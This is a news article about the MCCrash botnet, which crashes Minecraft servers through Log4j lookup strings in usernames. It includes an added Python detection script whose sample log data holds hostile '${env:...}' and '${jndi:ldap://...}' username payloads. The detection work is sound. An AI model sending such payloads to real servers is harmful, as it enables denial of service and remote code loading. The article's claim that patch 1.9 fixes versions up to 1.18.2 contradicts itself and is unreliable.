Microsoft researchers discover a Windows-Linux botnet that can take down Minecraft servers in an “efficient” distributed denial of service attack.
According to reporting by Ars Technica, the MCCrash botnet sends a command that populates the username field of a Minecraft server's login dialog, crashing the server by exhausting its resources.
“The use of an environment variable triggers the log4j 2 library, resulting in abnormal consumption of system resources (with [the] Log4Shell vulnerability), demonstrating a specific and highly effective DDoS method,” wrote the Microsoft researchers.
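A defender-side check for the username-lookup technique described above, added here as an example and not code from Microsoft or Ars Technica: it scans constructed Minecraft-style server log lines for usernames that carry Log4j 2 lookup syntax and counts them per source address, so a flood from one host stands out. The log line format, the sample entries and the alert threshold are assumptions.

```python
import re
from collections import Counter

# Constructed sample of Minecraft-server-style log lines (assumed format, not real captures).
SAMPLE_LOG = """\
[12:00:01] [User Authenticator #1/INFO]: UUID of player Steve is 8667ba71-b85a-4004-af54-457a9734eed7
[12:00:02] [Server thread/INFO]: Steve[/203.0.113.7:54321] logged in with entity id 123 at (0.5, 64.0, 0.5)
[12:00:03] [Server thread/INFO]: ${env:JAVA_HOME}[/198.51.100.9:40001] logged in with entity id 124 at (0.5, 64.0, 0.5)
[12:00:03] [Server thread/INFO]: ${env:PATH}[/198.51.100.9:40002] logged in with entity id 125 at (0.5, 64.0, 0.5)
[12:00:04] [Server thread/INFO]: ${jndi:ldap://example.invalid/a}[/198.51.100.9:40003] logged in with entity id 126 at (0.5, 64.0, 0.5)
[12:00:05] [Server thread/INFO]: Alex[/192.0.2.4:50000] logged in with entity id 127 at (1.5, 64.0, 1.5)
"""

# One line per login: "<name>[/<ip>:<port>] logged in with entity id ..." (assumed layout)
LOGIN_RE = re.compile(r"\]: (?P<name>.+?)\[/(?P<ip>[0-9.]+):\d+\] logged in ")
# Log4j 2 lookup syntax "${prefix:...}" appearing inside a username
LOOKUP_RE = re.compile(r"\$\{\s*([A-Za-z]+)\s*:")


def parse_logins(log_text):
    """Return (name, ip) tuples for every login line in the log text."""
    logins = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            logins.append((m.group("name"), m.group("ip")))
    return logins


def find_lookup_logins(log_text):
    """Return (ip, name, lookup_prefix) for logins whose username carries lookup syntax."""
    hits = []
    for name, ip in parse_logins(log_text):
        m = LOOKUP_RE.search(name)
        if m:
            hits.append((ip, name, m.group(1).lower()))
    return hits


def suspicious_sources(log_text, threshold=2):
    """Count lookup-bearing logins per source IP and return those at or above the threshold."""
    counts = Counter(ip for ip, _, _ in find_lookup_logins(log_text))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, name, prefix in find_lookup_logins(SAMPLE_LOG):
        print(f"lookup '{prefix}' in username {name!r} from {ip}")
    print("sources over threshold:", suspicious_sources(SAMPLE_LOG))
```

Flagging is only a detection aid; the durable fix is keeping the server's Log4j 2 at a release that no longer performs lookups in logged messages.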
Widespread impact of the MCCrash botnet
Microsoft also noted that MCCrash is capable of crashing servers running various versions of the game server software.
This is where it gets a little complicated: MCCrash itself is only hardcoded to target version 1.12.2, but the attack technique is powerful enough to take down servers running versions 1.7.2 through 1.18.2, which Ars Technica estimates is about half of all Minecraft servers running today.
Patch version 1.9 of the server software disables the botnet's technique, but even without that patch, Microsoft was relieved to find that the botnet's impact was limited.
“The wide range of at-risk Minecraft servers underscores the impact the malicious software could have had if it had been specifically coded to affect versions after 1.12.2,” wrote the Microsoft researchers.
“This threat exploits the unique capabilities of Internet of Things (IoT) devices, which are not typically monitored as part of a botnet, greatly increasing its impact and reducing the chance of detection.”
The most common initial infection points for MCCrash are Windows machines on which users have installed software that claims to activate the operating system with an illegal license but mostly contains malware, which deploys the Python scripts that provide the botnet's logic.
Infected Windows devices then scan the internet for devices running Linux distributions such as Debian, Ubuntu, and CentOS, log in to them using default credentials, and run the same .py script on them; these newly infected devices can then be used to launch DDoS attacks on Minecraft servers and other devices.
Microsoft did not disclose the number of devices infected by MCCrash, but Ars Technica claims the geographic breakdown shows that many are in Russia, echoing the 2022 Microsoft Digital Defense Report, which claims that the Russia-Ukraine conflict is driven in part by cybercrime.